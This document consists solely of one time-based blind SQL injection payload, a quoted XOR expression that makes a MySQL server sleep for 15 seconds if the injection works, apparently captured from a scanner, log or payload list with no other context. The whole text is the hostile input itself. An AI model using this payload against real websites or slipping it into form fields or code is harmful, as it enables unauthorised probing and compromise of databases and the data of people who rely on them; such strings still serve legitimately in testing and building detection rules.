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0"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z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